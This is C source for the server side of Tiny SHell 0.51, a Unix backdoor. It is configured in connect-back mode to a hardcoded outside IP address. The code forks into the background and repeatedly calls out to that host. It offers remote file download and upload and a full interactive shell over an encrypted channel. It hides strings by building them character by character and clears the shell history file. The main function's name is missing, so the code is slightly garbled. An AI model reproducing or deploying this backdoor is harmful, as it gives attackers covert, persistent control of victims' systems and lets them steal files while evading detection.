/*
 * Tiny SHell version 0.51 - server side
 * by Christophe Devine <devine@cr0.net>
 * this program is licensed under the GPL.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <termios.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <netdb.h>

#if defined LINUX || defined OSF
  #include <pty.h>
#else
#if defined FREEBSD
  #include <libutil.h>
#else
#if defined OPENBSD
  #include <util.h>
#else
#if defined SUNOS || defined HPUX
  #include <sys/stropts.h>
#else
#if ! defined CYGWIN && ! defined IRIX
  #error Please define the host system
#endif
#endif
#endif
#endif
#endif

#include "tsh.h"
#include "pel.h"
#include "sha1.h"

/* Uncomment and change the following constants as needed if you
 * want to use tshd in connect-back mode on a firewalled machine */


#define CONNECT_BACK_HOST   "219.22.88.70"
#define CONNECT_BACK_DELAY  1000


/* program entry point */

int ( void )
{
    unsigned char buffer[BUFSIZE];
    int pid, n, client, action;

    struct sockaddr_in client_addr;
    struct winsize ws;

#ifndef CONNECT_BACK_HOST

    int server;
    struct sockaddr_in server_addr;

#endif

    /* fork into background */

    if( ( pid = fork() ) < 0 )
    {
        return( 2 );
    }

    if( pid ) return( 0 );

    /* create a new session */

    if( setsid() < 0 )
    {
        return( 3 );
    }

    /* close all file descriptors */

    for( n = 0; n < 1024; n++ )
    {
        close( n );
    }

#ifndef CONNECT_BACK_HOST

    server_addr.sin_family      = AF_INET;
    server_addr.sin_port        = htons( SERVER_PORT );
    server_addr.sin_addr.s_addr = INADDR_ANY;

    /* create the socket */

    if( ( server = socket( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
        return( 4 );
    }

    /* bind the server to the port it will listen on */

    n = 1;

    if( setsockopt( server, SOL_SOCKET, SO_REUSEADDR,
                    (void *) &n, sizeof( n ) ) < 0 )
    {
        return( 5 );
    }

    if( bind( server, (struct sockaddr *) &server_addr,
              sizeof( server_addr ) ) < 0 )
    {
        return( 6 );
    }

    if( listen( server, 5 ) != 0 )
    {
        return( 7 );
    }

    while( 1 )
    {
        n = sizeof( client_addr );

        /* wait for inboud connections */

        if( ( client = accept( server, (struct sockaddr *)
                                &client_addr, &n ) ) < 0 )
        {
            return( 8 );
        }

#else

    while( 1 )
    {
        struct hostent *client_host;

        /* resolve the client hostname */

        if( ! ( client_host = gethostbyname( CONNECT_BACK_HOST ) ) )
        {
            sleep( CONNECT_BACK_DELAY );
            continue;
        }

        memcpy( (void *) &client_addr.sin_addr,
                (void *) client_host->h_addr,
                client_host->h_length );

        client_addr.sin_family      = AF_INET;
        client_addr.sin_port        = htons( SERVER_PORT );

        /* create a socket */

        if( ( client = socket( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
        {
            sleep( CONNECT_BACK_DELAY );
            continue;
        }

        /* try to connect back to the client */

        if( connect( client, (struct sockaddr *) &client_addr,
                     sizeof( client_addr ) ) < 0 )
        {
            close( client );
            sleep( CONNECT_BACK_DELAY );
            continue;
        }

#endif

        /* fork a child to handle the connection */

        if( ( pid = fork() ) < 0 )
        {
            close( client );
            continue;
        }

        if( pid )
        {
            /* in father - wait for the child to terminate */

            close( client );
            waitpid( pid, NULL, 0 );
            continue;
        }

        /* the child forks and then exits so that the grand-child's
         * father becomes init (this to avoid becoming a zombie) */

        if( ( pid = fork() ) < 0 )
        {
            return( 9 );
        }

        if( pid ) return( 0 );

        /* set a timeout of 1 second waiting for the initial data */

        alarm( 1 );

        /* setup the packet encryption layer */

        if( pel_server_init( client, secret ) )
        {
            return( 10 );
        }

        /* then get the action requested by the client */

        if( pel_recv( client, buffer, 4, 0 ) != 4 )
        {
            return( 11 );
        }

        GET_UINT32( action, buffer, 0 );

        /* get the mandatory string argument */

        if( pel_recv( client, buffer, 4, 0 ) != 4 )
        {
            return( 12 );
        }

        GET_UINT32( n, buffer, 0 );

        if( n <= 0 || n >= BUFSIZE )
        {
            return( 13 );
        }

        if( pel_recv( client, buffer, n, 0 ) != n )
        {
            return( 14 );
        }

        buffer[n] = '\0';

        /* preliminary stuff went well */

        alarm( 0 );

        {
            char *home;

            /* setup the HOME environment variable */

            if( ( home = (char *) malloc( 14 ) ) == NULL )
            {
                return( 15 );
            }

            home[0] = 'H'; home[ 7] = 'a';
            home[1] = 'O'; home[ 8] = 'r';
            home[2] = 'M'; home[ 9] = '/';
            home[3] = 'E'; home[10] = 't';
            home[4] = '='; home[11] = 'm';
            home[5] = '/'; home[12] = 'p';
            home[6] = 'v'; home[13] = '\0';

            putenv( home );

            /* and change the current directory to home */

            chdir( home + 5 );
        }

        switch( action )
        {
        case GET_FILE :
        {
            int file;

            /* open local file */

            if( ( file = open( (char *) buffer, O_RDONLY ) ) < 0 )
            {
                return( 16 );
            }

            /* send the data */

            while( ( n = read( file, buffer, BUFSIZE ) ) > 0 )
            {
                if( pel_send( client, buffer, n, 0 ) != n )
                {
                    return( 17 );
                }
            }

            if( n < 0 )
            {
                return( 18 );
            }

            return( 19 );
        }

        case PUT_FILE :
        {
            int file;

            /* create local file */

            if( ( file = creat( (char *) buffer, S_IRWXU ) ) < 0 )
            {
                return( 20 );
            }

            /* fetch the data */

            while( ( n = pel_recv( client, buffer, BUFSIZE, 0 ) ) > 0 )
            {
                if( write( file, buffer, n ) != n )
                {
                    return( 21 );
                }
            }

            if( n < 0 )
            {
                return( 22 );
            }

            return( 23 );
        }

        case RUNSHELL :
        {
            char *command, *slave;
            int pty, tty;

            /* copy the system command */

            if( ( command = (char *) malloc( n + 1 ) ) == NULL )
            {
                return( 24 );
            }

            strncpy( command, (char *) buffer, n + 1 );

            /*  get the window size */

            if( pel_recv( client, buffer, 16, 0 ) != 16 )
            {
                return( 25 );
            }

            GET_UINT32( ws.ws_row,    buffer,  0 );
            GET_UINT32( ws.ws_col,    buffer,  4 );
            GET_UINT32( ws.ws_xpixel, buffer,  8 );
            GET_UINT32( ws.ws_ypixel, buffer, 12 );

            /* get the TERM environment variable */

            if( pel_recv( client, buffer, 4, 0 ) != 4 )
            {
                return( 26 );
            }

            GET_UINT32( n, buffer, 0 );

            if( n <= 0 || n >= BUFSIZE )
            {
                return( 27 );
            }

            if( pel_recv( client, buffer, n, 0 ) != n )
            {
                return( 28 );
            }

            buffer[n] = '\0';

            {
                char * term;

                /* add TERM in the environment */

                if( ( term = (char *) malloc( n + 6 ) ) == NULL )
                {
                    return( 29 );
                }

                term[0] = 'T'; term[3] = 'M';
                term[1] = 'E'; term[4] = '=';
                term[2] = 'R';

                strncpy( term + 5, (char *) buffer, n + 1 );

                putenv( term );
            }

            /* now request a pseudo-terminal */

#if defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF

            if( openpty( &pty, &tty, NULL, NULL, NULL ) < 0 )
            {
                return( 30 );
            }

            if( ( slave = ttyname( tty ) ) == NULL )
            {
                return( 31 );
            }

#else
#if defined IRIX

            if( ( slave = _getpty( &pty, O_RDWR, 0622, 0 ) ) == NULL )
            {
                return( 32 );
            }

            if( ( tty = open( slave, O_RDWR | O_NOCTTY ) ) < 0 )
            {
                return( 33 );
            }

#else
#if defined CYGWIN || defined SUNOS || defined HPUX

            if( ( pty = open( "/dev/ptmx", O_RDWR | O_NOCTTY ) ) < 0 )
            {
                return( 34 );
            }

            if( grantpt( pty ) < 0 )
            {
                return( 35 );
            }

            if( unlockpt( pty ) < 0 )
            {
                return( 36 );
            }

            if( ( slave = ptsname( pty ) ) == NULL )
            {
                return( 37 );
            }

            if( ( tty = open( slave, O_RDWR | O_NOCTTY ) ) < 0 )
            {
                return( 38 );
            }

#if defined SUNOS || defined HPUX

            if( ioctl( tty, I_PUSH, "ptem" ) < 0 )
            {
                return( 39 );
            }

            if( ioctl( tty, I_PUSH, "ldterm" ) < 0 )
            {
                return( 40 );
            }

#if defined SUNOS

            if( ioctl( tty, I_PUSH, "ttcompat" ) < 0 )
            {
                return( 41 );
            }

#endif
#endif
#endif
#endif
#endif

            /* set the window size */

            if( ioctl( pty, TIOCSWINSZ, &ws ) < 0 )
            {
                return( 42 );
            }

#ifndef CONNECT_BACK_HOST

            /* server socket is unneeded */

            close( server );

#endif

            /* fork to spawn a shell */

            if( ( pid = fork() ) < 0 )
            {
                return( 43 );
            }

            if( pid )
            {
                /* close the client socket and the pty (master side) */

                close( client );
                close( pty );

                /* create a new session */

                if( setsid() < 0 )
                {
                    return( 44 );
                }

                /* set controlling tty, to have job control */

#if defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF

                if( ioctl( tty, TIOCSCTTY, NULL ) < 0 )
                {
                    return( 45 );
                }

#else
#if defined CYGWIN || defined SUNOS || defined IRIX || defined HPUX

                {
                    int tty2;

                    if( ( tty2 = open( ttyname( tty ), O_RDWR ) ) < 0 )
                    {
                        return( 46 );
                    }

                    close( tty );

                    tty = tty2;
                }

#endif
#endif

                /* tty becomes stdin, stdout, stderr */

                dup2( tty, 0 );
                dup2( tty, 1 );
                dup2( tty, 2 );

                if( tty > 2 ) close( tty );

                /* just in case bash is run, kill the history file */

                {
                    char *histfile;

                    if( ( histfile = (char *) malloc( 10 ) ) == NULL )
                    {
                        return( 47 );
                    }

                    histfile[0] = 'H'; histfile[5] = 'I';
                    histfile[1] = 'I'; histfile[6] = 'L';
                    histfile[2] = 'S'; histfile[7] = 'E';
                    histfile[3] = 'T'; histfile[8] = '=';
                    histfile[4] = 'F'; histfile[9] = '\0';

                    putenv( histfile );
                }

                /* fire up the shell */

                buffer[0] = '/'; buffer[4] = '/';
                buffer[1] = 'b'; buffer[5] = 's';
                buffer[2] = 'i'; buffer[6] = 'h';
                buffer[3] = 'n'; buffer[7] = '\0';

                execl(  (char *) buffer,
                        (char *) buffer + 5, "-c", command, (char *) 0 );

                /* d0h, this shouldn't happen */

                return( 48 );
            }
            else
            {
                /* tty (slave side) not needed anymore */

                close( tty );

                /* let's forward the data back and forth */

                while( 1 )
                {
                    fd_set rd;

                    FD_ZERO( &rd );
                    FD_SET( client, &rd );
                    FD_SET( pty, &rd );

                    n = ( pty > client ) ? pty : client;

                    if( select( n + 1, &rd, NULL, NULL, NULL ) < 0 )
                    {
                        return( 49 );
                    }

                    if( FD_ISSET( client, &rd ) )
                    {
                        if( ( n = pel_recv( client, buffer,
                                            BUFSIZE, 0 ) ) < 0 )
                        {
                            return( 50 );
                        }
                        if( n == 0 )
                        {
                            return( 51 );
                        }
                        if( write( pty, buffer, n ) != n )
                        {
                            return( 52 );
                        }
                    }

                    if( FD_ISSET( pty, &rd ) )
                    {
                        if( ( n = read( pty, buffer, BUFSIZE ) ) < 0 )
                        {
                            return( 53 );
                        }
                        if( n == 0 )
                        {
                            return( 54 );
                        }
                        if( pel_send( client, buffer, n, 0 ) != n )
                        {
                            return( 55 );
                        }
                    }
                }
            }
        }

        default:

            return( 56 );
        }
    }

    /* not reached */

    return( 0 );
}
